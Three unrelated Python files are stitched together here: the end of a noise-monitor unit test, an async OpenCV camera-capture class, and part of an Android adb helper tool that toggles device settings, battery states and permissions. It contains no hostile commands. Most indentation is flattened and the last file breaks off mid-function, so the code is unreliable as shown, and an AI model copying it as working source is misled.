self.assertEqual(int(config.get_config_value("frames_per_buffer")), default_frames)
self.assertEqual(int(config.get_config_value("channels")), default_channels)
self.assertEqual(int(config.get_config_value("format")), default_format)
self.assertEqual(int(config.get_config_value("rate")), default_rate)
self.assertEqual(float(config.get_config_value("audio_segment_length")), default_audio_seg_length)
class NoiseObserver(unittest.TestCase):
"""
Test noise observer main loop.
"""
def setUp(self):
# Creates scripts for cli testing.
create_run_script(".test_monitoring.py", ".test_monitoring.txt")
def test_monitoring(self):
"""
Test if the monitoring starts.
"""
# Create runnable script.
# This script is used to create dictionary using cli.
res = subprocess.run([sys.executable, ".test_monitoring.py", "--trashesoutput"])
with open(".test_monitoring.txt", "r") as f:
kargs = ast.literal_eval(f.read())
# Passing cli as parameter.
del kargs["calibrate"]
del kargs["showindex"]
del kargs["setindex"]
        # Use a thread to start monitoring in a separate flow.
noise_obs = no.NoiseObserver(**kargs)
thread = Thread(target=noise_obs.start_monitoring)
thread.start()
self.assertTrue(noise_obs.is_monitoring())
noise_obs.stop_monitoring()
        thread.join()  # Wait until the thread terminates
self.assertFalse(noise_obs.is_monitoring())
os.remove(".test_monitoring.txt")
def tearDown(self):
os.remove(".test_monitoring.py")
if __name__ == '__main__':
unittest.main()
|
videocaptureasync.py
|
# https://github.com/gilbertfrancois/video-capture-async
import threading
import cv2
import time
WARMUP_TIMEOUT = 10.0
class VideoCaptureAsync:
def __init__(self, src=0, width=640, height=480):
self.src = src
self.cap = cv2.VideoCapture(self.src)
if not self.cap.isOpened():
raise RuntimeError("Cannot open camera. Try to choose other CAMID in './scripts/settings.sh'")
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.grabbed, self.frame = self.cap.read()
self.started = False
self.read_lock = threading.Lock()
def set(self, var1, var2):
self.cap.set(var1, var2)
def isOpened(self):
return self.cap.isOpened()
def start(self):
if self.started:
print('[!] Asynchronous video capturing has already been started.')
return None
self.started = True
self.thread = threading.Thread(target=self.update, args=(), daemon=True)
self.thread.start()
# (warmup) wait for the first successfully grabbed frame
warmup_start_time = time.time()
while not self.grabbed:
warmup_elapsed_time = (time.time() - warmup_start_time)
if warmup_elapsed_time > WARMUP_TIMEOUT:
raise RuntimeError(f"Failed to succesfully grab frame from the camera (timeout={WARMUP_TIMEOUT}s). Try to restart.")
time.sleep(0.5)
return self
def update(self):
while self.started:
grabbed, frame = self.cap.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
return grabbed, frame
def stop(self):
self.started = False
self.thread.join()
def __exit__(self, exec_type, exc_value, traceback):
self.cap.release()
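if __name__ == "__main__":
    # Minimal usage sketch (not part of the upstream module): drives the async
    # capture for a few frames. Assumes a camera is reachable at index 0 and
    # that a display is available for cv2.imshow.
    cap = VideoCaptureAsync(src=0)
    cap.start()
    try:
        for _ in range(100):
            grabbed, frame = cap.read()
            if grabbed:
                cv2.imshow("VideoCaptureAsync demo", frame)
            if cv2.waitKey(10) & 0xFF == ord("q"):
                break
    finally:
        cap.stop()
        # The class releases the underlying VideoCapture only in __exit__,
        # so release it explicitly here.
        cap.cap.release()
        cv2.destroyAllWindows()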
|
adb_enhanced.py
|
#!/usr/bin/python
# Python 2 and 3, print compatibility
from __future__ import absolute_import, print_function
# Without this, urllib.parse (which is Python 3 only) cannot be accessed in Python 2.
from future.standard_library import install_aliases
install_aliases()
import psutil
import re
import signal
import subprocess
import sys
import tempfile
import threading
import time
import os
import random
# This is required only for Python 2
# pylint: disable=import-error
from urllib.parse import urlparse
# asyncio was introduced in version 3.5
if sys.version_info >= (3, 5):
try:
        try:
            from adbe import asyncio_helper
        except ImportError:
            # This works when the code is executed directly rather than as an installed package.
            import asyncio_helper
        _ASYNCIO_AVAILABLE = True
    except ImportError:
        # asyncio_helper could not be imported; fall back to sequential execution.
_ASYNCIO_AVAILABLE = False
else:
_ASYNCIO_AVAILABLE = False
try:
    # This fails when the code is executed directly and not as part of a python package installation;
    # I definitely need a better way to handle this.
from adbe.adb_helper import (get_adb_shell_property, execute_adb_command2, execute_adb_shell_command,
execute_adb_shell_command2, execute_file_related_adb_shell_command, get_package,
root_required_to_access_file, get_device_android_api_version)
from adbe.output_helper import print_message, print_error, print_error_and_exit, print_verbose
except ImportError:
# This works when the code is executed directly.
from adb_helper import (get_adb_shell_property, execute_adb_command2, execute_adb_shell_command,
execute_adb_shell_command2, execute_file_related_adb_shell_command, get_package,
root_required_to_access_file, get_device_android_api_version)
from output_helper import print_message, print_error, print_error_and_exit, print_verbose
_KEYCODE_BACK = 4
_MIN_API_FOR_RUNTIME_PERMISSIONS = 23
# Value to be returned as 'on' to the user
_USER_PRINT_VALUE_ON = 'on'
# Value to be returned as 'partially on' to the user
_USER_PRINT_VALUE_PARTIALLY_ON = 'partially on'
# Value to be returned as 'off' to the user
_USER_PRINT_VALUE_OFF = 'off'
# Value to be returned as 'unknown' to the user
_USER_PRINT_VALUE_UNKNOWN = 'unknown'
def _ensure_package_exists(package_name):
"""
Don't call this directly. Instead consider decorating your method with
@ensure_package_exists or @ensure_package_exists2
    Exits with an error if the package_name package is not installed on the device.
"""
if not _package_exists(package_name):
print_error_and_exit("Package %s does not exist" % package_name)
# A decorator to ensure package exists
def ensure_package_exists(func):
def func_wrapper(package_name):
_ensure_package_exists(package_name)
return func(package_name)
return func_wrapper
# A decorator to ensure package exists with one more argument
def ensure_package_exists2(func):
def func_wrapper(package_name, arg2):
_ensure_package_exists(package_name)
return func(package_name, arg2)
return func_wrapper
# A decorator to ensure package exists with two more arguments
def ensure_package_exists3(func):
def func_wrapper(package_name, arg2, arg3):
_ensure_package_exists(package_name)
return func(package_name, arg2, arg3)
return func_wrapper
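# Hedged usage sketch (not part of the original source): the decorators above
# are applied to package-oriented commands further down in this file, e.g.
#
#     @ensure_package_exists
#     def force_stop(app_name): ...
#
# so the wrapped function only runs after _ensure_package_exists has confirmed
# the package is installed; otherwise the tool exits with an error.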
def _package_exists(package_name):
cmd = 'pm path %s' % package_name
return_code, response, _ = execute_adb_shell_command2(cmd)
return return_code == 0 and response is not None and len(response.strip()) != 0
# Source:
# https://github.com/dhelleberg/android-scripts/blob/master/src/devtools.groovy
def handle_gfx(value):
if value == 'on':
cmd = 'setprop debug.hwui.profile visual_bars'
elif value == 'off':
cmd = 'setprop debug.hwui.profile false'
elif value == 'lines':
cmd = 'setprop debug.hwui.profile visual_lines'
else:
print_error_and_exit('Unexpected value for gfx %s' % value)
return
execute_adb_shell_command_and_poke_activity_service(cmd)
# Source: https://github.com/dhelleberg/android-scripts/blob/master/src/devtools.groovy
# https://plus.google.com/+AladinQ/posts/dpidzto1b8B
def handle_overdraw(value):
version = get_device_android_api_version()
if version < 19:
        if value == 'on':
            cmd = 'setprop debug.hwui.show_overdraw true'
        elif value == 'off':
            cmd = 'setprop debug.hwui.show_overdraw false'
        elif value == 'deut':
print_error_and_exit(
'deut mode is available only on API 19 and above, your Android API version is %d' % version)
return
else:
print_error_and_exit('Unexpected value for overdraw %s' % value)
return
else:
        if value == 'on':
            cmd = 'setprop debug.hwui.overdraw show'
        elif value == 'off':
            cmd = 'setprop debug.hwui.overdraw false'
        elif value == 'deut':
cmd = 'setprop debug.hwui.overdraw show_deuteranomaly'
else:
print_error_and_exit('Unexpected value for overdraw %s' % value)
return
execute_adb_shell_command_and_poke_activity_service(cmd)
# Perform screen rotation. Accepts four direction types - left, right, portrait, and landscape.
# Source:
# https://stackoverflow.com/questions/25864385/changing-android-device-orientation-with-adb
def handle_rotate(direction):
disable_acceleration = 'put system accelerometer_rotation 0'
execute_adb_shell_settings_command(disable_acceleration)
    if direction == 'portrait':
        new_direction = 0
    elif direction == 'landscape':
        new_direction = 1
    elif direction == 'left':
        current_direction = get_current_rotation_direction()
        print_verbose("Current direction: %s" % current_direction)
        if current_direction is None:
            return
        new_direction = (current_direction + 1) % 4
    elif direction == 'right':
current_direction = get_current_rotation_direction()
print_verbose("Current direction: %s" % current_direction)
if current_direction is None:
return
new_direction = (current_direction - 1) % 4
else:
print_error_and_exit('Unexpected direction %s' % direction)
return
cmd = 'put system user_rotation %s' % new_direction
execute_adb_shell_settings_command(cmd)
def get_current_rotation_direction():
cmd = 'get system user_rotation'
direction = execute_adb_shell_settings_command(cmd)
print_verbose("Return value is %s" % direction)
if not direction or direction == 'null':
return 0 # default direction is 0, vertical straight
try:
return int(direction)
except ValueError as e:
print_error("Failed to get direction, error: \"%s\"" % e)
def handle_layout(value):
if value:
cmd = 'setprop debug.layout true'
else:
cmd = 'setprop debug.layout false'
execute_adb_shell_command_and_poke_activity_service(cmd)
# Source: https://stackoverflow.com/questions/10506591/turning-airplane-mode-on-via-adb
# This is incomplete
def handle_airplane(turn_on):
if turn_on:
cmd = 'put global airplane_mode_on 1'
else:
cmd = 'put global airplane_mode_on 0'
# At some version, this became a protected intent, so, it might require root to succeed.
broadcast_change_cmd = 'am broadcast -a android.intent.action.AIRPLANE_MODE'
# This is a protected intent which would require root to run
# https://developer.android.com/reference/android/content/Intent.html#ACTION_AIRPLANE_MODE_CHANGED
broadcast_change_cmd = 'su root %s' % broadcast_change_cmd
execute_adb_shell_settings_command2(cmd)
return_code, _, _ = execute_adb_shell_command2(broadcast_change_cmd)
if return_code != 0:
print_error_and_exit('Failed to change airplane mode')
else:
print_message('Airplane mode changed successfully')
def get_battery_saver_state():
_error_if_min_version_less_than(19)
cmd = 'get global low_power'
return_code, stdout, _ = execute_adb_shell_settings_command2(cmd)
if return_code != 0:
print_error('Failed to get battery saver state')
return _USER_PRINT_VALUE_UNKNOWN
if stdout.strip() == 'null':
return _USER_PRINT_VALUE_OFF
state = 0
try:
state = int(stdout.strip())
except ValueError:
print_error('Unable to get int value from "%s"' % stdout.strip())
return _USER_PRINT_VALUE_UNKNOWN
if state == 0:
return _USER_PRINT_VALUE_OFF
else:
return _USER_PRINT_VALUE_ON
# Source:
# https://stackoverflow.com/questions/28234502/programmatically-enable-disable-battery-saver-mode
def handle_battery_saver(turn_on):
_error_if_min_version_less_than(19)
if turn_on:
cmd = 'put global low_power 1'
else:
cmd = 'put global low_power 0'
if turn_on:
return_code, _, _ = execute_adb_shell_command2(get_battery_unplug_cmd())
if return_code != 0:
print_error_and_exit('Failed to unplug battery')
return_code, _, _ = execute_adb_shell_command2(get_battery_discharging_cmd())
if return_code != 0:
print_error_and_exit('Failed to put battery in discharge mode')
return_code, _, _ = execute_adb_shell_settings_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to modify battery saver mode')
# Source:
# https://stackoverflow.com/questions/28234502/programmatically-enable-disable-battery-saver-mode
def handle_battery_level(level):
_error_if_min_version_less_than(19)
if level < 0 or level > 100:
print_error_and_exit(
'Battery percentage %d is outside the valid range of 0 to 100' %
level)
cmd = 'dumpsys battery set level %d' % level
execute_adb_shell_command2(get_battery_unplug_cmd())
execute_adb_shell_command2(get_battery_discharging_cmd())
execute_adb_shell_command2(cmd)
# Source:
# https://stackoverflow.com/questions/28234502/programmatically-enable-disable-battery-saver-mode
def handle_battery_reset():
# The battery related commands fail silently on API 16. I am not sure about 17 and 18.
_error_if_min_version_less_than(19)
cmd = get_battery_reset_cmd()
execute_adb_shell_command2(cmd)
# https://developer.android.com/training/monitoring-device-state/doze-standby.html
def handle_doze(turn_on):
_error_if_min_version_less_than(23)
enable_idle_mode_cmd = 'dumpsys deviceidle enable'
if turn_on:
# Source: https://stackoverflow.com/a/42440619
cmd = 'dumpsys deviceidle force-idle'
execute_adb_shell_command2(get_battery_unplug_cmd())
execute_adb_shell_command2(get_battery_discharging_cmd())
execute_adb_shell_command2(enable_idle_mode_cmd)
execute_adb_shell_command2(cmd)
else:
cmd = 'dumpsys deviceidle unforce'
execute_adb_shell_command2(get_battery_reset_cmd())
execute_adb_shell_command2(enable_idle_mode_cmd)
execute_adb_shell_command2(cmd)
# Source: https://github.com/dhelleberg/android-scripts/blob/master/src/devtools.groovy
# Ref:
# https://gitlab.com/SaberMod/pa-android-frameworks-base/commit/a53de0629f3b94472c0f160f5bbe1090b020feab
def get_update_activity_service_cmd():
# Note: 1599295570 == ('_' << 24) | ('S' << 16) | ('P' << 8) | 'R'
return 'service call activity 1599295570'
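# Hedged derivation (not in the original comment): with ASCII codes
# '_' = 0x5F, 'S' = 0x53, 'P' = 0x50 and 'R' = 0x52,
# (0x5F << 24) | (0x53 << 16) | (0x50 << 8) | 0x52 == 0x5F535052 == 1599295570,
# which matches the transaction code passed to "service call activity" above.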
# This command puts the battery in discharging mode (most likely this is
# Android 6.0 onwards only)
def get_battery_discharging_cmd():
return 'dumpsys battery set status 3'
def get_battery_unplug_cmd():
return 'dumpsys battery unplug'
def get_battery_reset_cmd():
return 'dumpsys battery reset'
@ensure_package_exists
def handle_get_jank(app_name):
running = _is_app_running(app_name)
if not running:
# Jank information cannot be fetched unless the app is running
print_verbose('Starting the app %s to get its jank information' % app_name)
launch_app(app_name)
try:
cmd = 'dumpsys gfxinfo %s ' % app_name
return_code, result, _ = execute_adb_shell_command2(cmd)
print_verbose(result)
found = False
if return_code == 0:
for line in result.split('\n'):
if line.find('Janky') != -1:
print(line)
found = True
break
if not found:
print_error('No jank information found for %s' % app_name)
finally:
# If app was not running then kill app after getting the jank information.
if not running:
print_verbose('Stopping the app %s after getting its jank information' % app_name)
force_stop(app_name)
def _is_app_running(app_name):
return_code, result, _ = execute_adb_shell_command2('ps -o NAME')
if return_code != 0 or not result:
return False
result = result.strip()
return result.find(app_name) != -1
def handle_list_devices():
cmd = 'devices -l'
return_code, stdout, stderr = execute_adb_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to execute command %s, error: %s ' % (cmd, stderr))
# Skip the first line, it says "List of devices attached"
device_infos = stdout.split('\n')[1:]
if len(device_infos) == 0 or (
len(device_infos) == 1 and len(device_infos[0]) == 0):
print_error_and_exit('No attached Android device found')
elif len(device_infos) == 1:
_print_device_info()
else:
for device_info in device_infos:
if len(device_info) == 0:
continue
device_serial = device_info.split()[0]
if 'unauthorized' in device_info:
device_info = ' '.join(device_info.split()[1:])
print_error(
('Unlock Device "%s" and give USB debugging access to ' +
'this PC/Laptop by unlocking and reconnecting ' +
'the device. More info about this device: "%s"\n') % (
device_serial, device_info))
else:
_print_device_info(device_serial)
def _print_device_info(device_serial=None):
manufacturer = get_adb_shell_property('ro.product.manufacturer', device_serial=device_serial)
model = get_adb_shell_property('ro.product.model', device_serial=device_serial)
# This worked on 4.4.3 API 19 Moto E
display_name = get_adb_shell_property('ro.product.display', device_serial=device_serial)
# First fallback: undocumented
if display_name is None or len(display_name) == 0 or display_name == 'null':
# This works on 4.4.4 API 19 Galaxy Grand Prime
if get_device_android_api_version(device_serial=device_serial) >= 19:
display_name = execute_adb_shell_settings_command('get system device_name', device_serial=device_serial)
# Second fallback, documented to work on API 25 and above
# Source: https://developer.android.com/reference/android/provider/Settings.Global.html#DEVICE_NAME
if display_name is None or len(display_name) == 0 or display_name == 'null':
if get_device_android_api_version(device_serial=device_serial) >= 25:
display_name = execute_adb_shell_settings_command('get global device_name', device_serial=device_serial)
# ABI info
abi = get_adb_shell_property('ro.product.cpu.abi', device_serial=device_serial)
release = get_adb_shell_property('ro.build.version.release', device_serial=device_serial)
sdk = get_adb_shell_property('ro.build.version.sdk', device_serial=device_serial)
print_message(
'Serial ID: %s\nManufacturer: %s\nModel: %s (%s)\nRelease: %s\nSDK version: %s\nCPU: %s\n' %
(device_serial, manufacturer, model, display_name, release, sdk, abi))
def print_top_activity():
app_name, activity_name = _get_top_activity_data()
if app_name:
print_message('Application name: %s' % app_name)
if activity_name:
print_message('Activity name: %s' % activity_name)
def _get_top_activity_data():
cmd = 'dumpsys window windows'
return_code, output, _ = execute_adb_shell_command2(cmd)
if return_code != 0 and not output:
print_error_and_exit('Device returned no response, is it still connected?')
for line in output.split('\n'):
line = line.strip()
if line.startswith('mFocusedApp'):
regex_result = re.search(r'ActivityRecord{.* (\S+)/(\S+)', line)
if regex_result is None:
print_error('Unable to parse activity name from:')
print_error(line)
return None, None
app_name, activity_name = regex_result.group(1), regex_result.group(2)
# If activity name is a short hand then complete it.
if activity_name.startswith('.'):
activity_name = '%s%s' %(app_name, activity_name)
return app_name, activity_name
return None, None
def dump_ui(xml_file):
tmp_file = _create_tmp_file('dump-ui', 'xml')
cmd1 = 'uiautomator dump %s' % tmp_file
cmd2 = 'pull %s %s' % (tmp_file, xml_file)
cmd3 = 'rm %s' % tmp_file
print_verbose('Writing UI to %s' % tmp_file)
return_code, _, stderr = execute_adb_shell_command2(cmd1)
if return_code != 0:
print_error_and_exit('Failed to execute \"%s\", stderr: \"%s\"' % (cmd1, stderr))
print_verbose('Pulling file %s' % xml_file)
return_code, _, stderr = execute_adb_command2(cmd2)
print_verbose('Deleting file %s' % tmp_file)
execute_adb_shell_command2(cmd3)
if return_code != 0:
print_error_and_exit('Failed to fetch file %s' % tmp_file)
else:
print_message('XML UI dumped to %s, you might want to format it using \"xmllint --format %s\"' %
(xml_file, xml_file))
@ensure_package_exists
def force_stop(app_name):
cmd = 'am force-stop %s' % app_name
return_code, stdout, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to stop \"%s\"' % app_name)
else:
print_message(stdout)
@ensure_package_exists
def clear_disk_data(app_name):
cmd = 'pm clear %s' % app_name
return_code, _, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to clear data of \"%s\"' % app_name)
def get_mobile_data_state():
# Using "adb shell dumpsys telephony.registry | ag mDataConnectionState"
cmd = 'dumpsys telephony.registry'
return_code, stdout, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error('Failed to get mobile data setting')
return _USER_PRINT_VALUE_UNKNOWN
m = re.search(r'mDataConnectionState=(\d+)', stdout)
if not m:
print_error('Failed to get mobile data setting from "%s"' % stdout)
return _USER_PRINT_VALUE_UNKNOWN
if int(m.group(1)) == 0:
return _USER_PRINT_VALUE_OFF
else:
return _USER_PRINT_VALUE_ON
# Source:
# https://stackoverflow.com/questions/26539445/the-setmobiledataenabled-method-is-no-longer-callable-as-of-android-l-and-later
def handle_mobile_data(turn_on):
if turn_on:
cmd = 'svc data enable'
else:
cmd = 'svc data disable'
return_code, _, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to change mobile data setting')
def force_rtl(turn_on):
_error_if_min_version_less_than(19)
if turn_on:
cmd = 'put global debug.force_rtl 1'
else:
cmd = 'put global debug.force_rtl 0'
execute_adb_shell_settings_command_and_poke_activity_service(cmd)
def dump_screenshot(filepath):
screenshot_file_path_on_device = _create_tmp_file('screenshot', 'png')
dump_cmd = 'screencap -p %s ' % screenshot_file_path_on_device
return_code, stdout, stderr = execute_adb_shell_command2(dump_cmd)
if return_code != 0:
print_error_and_exit(
'Failed to capture the screenshot: (stdout: %s, stderr: %s)' % (stdout, stderr))
pull_cmd = 'pull %s %s' % (screenshot_file_path_on_device, filepath)
execute_adb_command2(pull_cmd)
del_cmd = 'rm %s' % screenshot_file_path_on_device
execute_adb_shell_command2(del_cmd)
def dump_screenrecord(filepath):
_error_if_min_version_less_than(19)
api_version = get_device_android_api_version()
    # Tested: this works on API 23 and above; up to API 22 it does not work on the emulator.
if api_version < 23 and _is_emulator():
print_error_and_exit('screenrecord is not supported on emulator below API 23\n' +
'Source: %s ' % 'https://issuetracker.google.com/issues/36982354')
screen_record_file_path_on_device = None
original_sigint_handler = None
def _start_recording():
global screen_record_file_path_on_device
print_message('Recording video, press Ctrl+C to end...')
screen_record_file_path_on_device = _create_tmp_file('screenrecord', 'mp4')
dump_cmd = 'screenrecord --verbose %s ' % screen_record_file_path_on_device
execute_adb_shell_command2(dump_cmd)
def _pull_and_delete_file_from_device():
global screen_record_file_path_on_device
print_message('Saving recording to %s' % filepath)
pull_cmd = 'pull %s %s' % (screen_record_file_path_on_device, filepath)
execute_adb_command2(pull_cmd)
del_cmd = 'rm %s' % screen_record_file_path_on_device
execute_adb_shell_command2(del_cmd)
def _kill_all_child_processes():
current_process = psutil.Process()
children = current_process.children(recursive=True)
for child in children:
print_verbose('Child process is %s' % child)
os.kill(child.pid, signal.SIGTERM)
def _handle_recording_ended():
print_message('Finishing...')
# Kill all child processes.
# This is not neat but it is OK for now since we know that we have only one adb child process which is
# running screen recording.
_kill_all_child_processes()
# Wait for one second.
time.sleep(1)
# Finish rest of the processing.
_pull_and_delete_file_from_device()
# And exit
sys.exit(0)
def signal_handler(unused_sig, unused_frame):
# Restore the original handler for Ctrl-C
signal.signal(signal.SIGINT, original_sigint_handler)
_handle_recording_ended()
original_sigint_handler = signal.getsignal(signal.SIGINT)
signal.signal(signal.SIGINT, signal_handler)
_start_recording()
def get_mobile_data_saver_state():
cmd = 'cmd netpolicy get restrict-background'
return_code, stdout, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error('Failed to get mobile data saver mode setting')
return _USER_PRINT_VALUE_UNKNOWN
enabled = stdout.strip().find('enabled') != -1
if enabled:
return _USER_PRINT_VALUE_ON
else:
return _USER_PRINT_VALUE_OFF
# https://developer.android.com/training/basics/network-ops/data-saver.html
def handle_mobile_data_saver(turn_on):
if turn_on:
cmd = 'cmd netpolicy set restrict-background true'
else:
cmd = 'cmd netpolicy set restrict-background false'
return_code, _, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to modify data saver mode setting')
def get_dont_keep_activities_in_background_state():
cmd = 'get global always_finish_activities'
return_code, stdout, _ = execute_adb_shell_settings_command2(cmd)
if return_code != 0:
print_error('Failed to get don\'t keep activities in the background setting')
return _USER_PRINT_VALUE_UNKNOWN
if stdout.strip() == 'null':
return _USER_PRINT_VALUE_OFF
enabled = int(stdout.strip()) != 0
if enabled:
return _USER_PRINT_VALUE_ON
else:
return _USER_PRINT_VALUE_OFF
# Ref: https://github.com/android/platform_packages_apps_settings/blob/4ce19f5c4fd40f3bedc41d3fbcbdede8b2614501/src/com/android/settings/DevelopmentSettings.java#L2123
# adb shell settings put global always_finish_activities true might not work on all Android versions.
# It was in system (not global before ICS)
# adb shell service call activity 43 i32 1 followed by that
def handle_dont_keep_activities_in_background(turn_on):
    # Up to API 25 the value was true/false; above API 25, 1/0 works. Source: manual testing
use_true_false_as_value = get_device_android_api_version() <= 25
if turn_on:
value = 'true' if use_true_false_as_value else '1'
cmd1 = 'put global always_finish_activities %s' % value
cmd2 = 'service call activity 43 i32 1'
else:
value = 'false' if use_true_false_as_value else '0'
cmd1 = 'put global always_finish_activities %s' % value
cmd2 = 'service call activity 43 i32 0'
execute_adb_shell_settings_command(cmd1)
execute_adb_shell_command_and_poke_activity_service(cmd2)
def toggle_animations(turn_on):
if turn_on:
value = 1
else:
value = 0
# Source: https://github.com/jaredsburrows/android-gif-example/blob/824c493285a2a2cf22f085662431cf0a7aa204b8/.travis.yml#L34
cmd1 = 'put global window_animation_scale %d' % value
cmd2 = 'put global transition_animation_scale %d' % value
cmd3 = 'put global animator_duration_scale %d' % value
execute_adb_shell_settings_command(cmd1)
execute_adb_shell_settings_command(cmd2)
execute_adb_shell_settings_command(cmd3)
def get_show_taps_state():
cmd = 'get system show_touches'
return_code, stdout, _ = execute_adb_shell_settings_command2(cmd)
if return_code != 0:
print_error('Failed to get current state of "show user taps" setting')
return _USER_PRINT_VALUE_UNKNOWN
if int(stdout.strip()) == 1:
return _USER_PRINT_VALUE_ON
else:
return _USER_PRINT_VALUE_OFF
def toggle_show_taps(turn_on):
if turn_on:
value = 1
else:
value = 0
# Source: https://stackoverflow.com/a/32621809/434196
cmd = 'put system show_touches %d' % value
execute_adb_shell_settings_command(cmd)
def get_stay_awake_while_charging_state():
cmd = 'get global stay_on_while_plugged_in'
return_code, stdout, _ = execute_adb_shell_settings_command2(cmd)
if return_code != 0:
print_error('Failed to get "stay awake while plugged in" in the background setting')
return _USER_PRINT_VALUE_UNKNOWN
value = int(stdout.strip())
if value == 0:
return _USER_PRINT_VALUE_OFF
elif value == 7:
return _USER_PRINT_VALUE_ON
else:
return _USER_PRINT_VALUE_PARTIALLY_ON
# Source: https://developer.android.com/reference/android/provider/Settings.Global.html#STAY_ON_WHILE_PLUGGED_IN
def stay_awake_while_charging(turn_on):
if turn_on:
# 1 for USB charging, 2 for AC charging, 4 for wireless charging. Or them together to get 7.
value = 7
else:
value = 0
cmd1 = 'put global stay_on_while_plugged_in %d' % value
execute_adb_shell_settings_command_and_poke_activity_service(cmd1)
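# Hedged note (not in the original): STAY_ON_WHILE_PLUGGED_IN is a bit mask, so
# the values combine with bitwise OR: 1 | 2 == 3 would keep the screen awake on
# USB and AC power only, while 1 | 2 | 4 == 7 covers wireless charging as well.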
def input_text(text):
    # Replace each whitespace with %s, which Android translates back to whitespace.
cmd = 'input text %s' % text.replace(' ', '%s')
return_code, _, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to input text \"%s\"' % text)
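# Hedged example (not in the original): input_text('hello world') runs the shell
# command `input text hello%sworld`, and Android renders the %s as a space again.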
def press_back():
cmd = 'input keyevent 4'
return_code, _, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to press back')
def open_url(url):
# Let's not do any URL encoding for now, if required, we will add that in the future.
parsed_url = urlparse(url=url)
if parsed_url.scheme is None or len(parsed_url.scheme) == 0:
parsed_url2 = urlparse(url=url, scheme='http')
url = parsed_url2.geturl()
cmd = 'am start -a android.intent.action.VIEW -d %s' % url
return_code, _, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to open url \"%s\"' % url)
def list_permission_groups():
cmd = 'pm list permission-groups'
return_code, stdout, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to list permission groups')
else:
print_message(stdout)
def list_permissions(dangerous_only_permissions):
# -g is to group permissions by permission groups.
if dangerous_only_permissions:
# -d => dangerous only permissions
cmd = 'pm list permissions -g -d'
else:
cmd = 'pm list permissions -g'
return_code, stdout, stderr = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to list permissions: (stdout: %s, stderr: %s)' % (stdout, stderr))
else:
print_message(stdout)
# Creates a tmp file on Android device
def _create_tmp_file(filename_prefix=None, filename_suffix=None):
if filename_prefix is None:
filename_prefix = 'file'
if filename_suffix is None:
filename_suffix = 'tmp'
if filename_prefix.find('/') != -1:
print_error_and_exit('Filename prefix "%s" contains illegal character: "/"' % filename_prefix)
if filename_suffix.find('/') != -1:
print_error_and_exit('Filename suffix "%s" contains illegal character: "/"' % filename_suffix)
tmp_dir = '/data/local/tmp'
filepath_on_device = '%s/%s-%d.%s' % (
tmp_dir, filename_prefix, random.randint(1, 1000 * 1000 * 1000), filename_suffix)
if _file_exists(filepath_on_device):
# Retry if the file already exists
print_verbose('Tmp File %s already exists, trying a new random name' % filepath_on_device)
return _create_tmp_file(filename_prefix, filename_suffix)
# Create the file
return_code, stdout, stderr = execute_adb_shell_command2('touch %s' % filepath_on_device)
if return_code != 0:
print_error('Failed to create tmp file %s: (stdout: %s, stderr: %s)' % (filepath_on_device, stdout, stderr))
return None
# Make the tmp file world-writable or else, run-as command might fail to write on it.
return_code, stdout, stderr = execute_adb_shell_command2('chmod 666 %s' % filepath_on_device)
if return_code != 0:
print_error('Failed to chmod tmp file %s: (stdout: %s, stderr: %s)' % (filepath_on_device, stdout, stderr))
return None
return filepath_on_device
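# Hedged example (not in the original): _create_tmp_file('screenshot', 'png')
# would create a world-writable file such as
# /data/local/tmp/screenshot-<random integer>.png and return that path,
# or None if the file could not be created or chmod-ed.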
# Returns true if the file_path exists on the device, false if it does not exists or is inaccessible.
def _file_exists(file_path):
exists_cmd = "\"ls %s 1>/dev/null 2>/dev/null && echo exists\"" % file_path
stdout = execute_file_related_adb_shell_command(exists_cmd, file_path)
return stdout is not None and stdout.find('exists') != -1
def _is_sqlite_database(file_path):
return file_path.endswith('.db')
# Returns a fully-qualified permission group name.
def get_permission_group(args):
if args['contacts']:
return 'android.permission-group.CONTACTS'
elif args['phone']:
return 'android.permission-group.PHONE'
elif args['calendar']:
return 'android.permission-group.CALENDAR'
elif args['camera']:
return 'android.permission-group.CAMERA'
elif args['sensors']:
return 'android.permission-group.SENSORS'
elif args['location']:
return 'android.permission-group.LOCATION'
elif args['storage']:
return 'android.permission-group.STORAGE'
elif args['microphone']:
return 'android.permission-group.MICROPHONE'
elif args['sms']:
return 'android.permission-group.SMS'
else:
print_error_and_exit('Unexpected permission group: %s' % args)
return None
# Pass the full-qualified permission group name to this method.
def get_permissions_in_permission_group(permission_group):
# List permissions by group
cmd = 'pm list permissions -g'
return_code, stdout, stderr = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to run command %s (stdout: %s, stderr: %s)' % (cmd, stdout, stderr))
return None
permission_output = stdout
# Remove ungrouped permissions section completely.
if 'ungrouped:' in permission_output:
permission_output, _ = permission_output.split('ungrouped:')
splits = permission_output.split('group:')
for split in splits:
if split.startswith(permission_group):
potential_permissions = split.split('\n')
# Ignore the first entry which is the group name
potential_permissions = potential_permissions[1:]
# Filter out empty lines.
permissions = filter(
lambda x: len(
x.strip()) > 0,
potential_permissions)
permissions = list(map(
lambda x: x.replace(
'permission:', ''), permissions))
print_message(
'Permissions in %s group are %s' %
(permission_group, permissions))
return permissions
return None
@ensure_package_exists3
def grant_or_revoke_runtime_permissions(package_name, action_grant, permissions):
_error_if_min_version_less_than(23)
if action_grant:
cmd = 'pm grant %s' % package_name
else:
cmd = 'pm revoke %s' % package_name
for permission in permissions:
execute_adb_shell_command(cmd + ' ' + permission)
def _get_all_packages(pm_cmd):
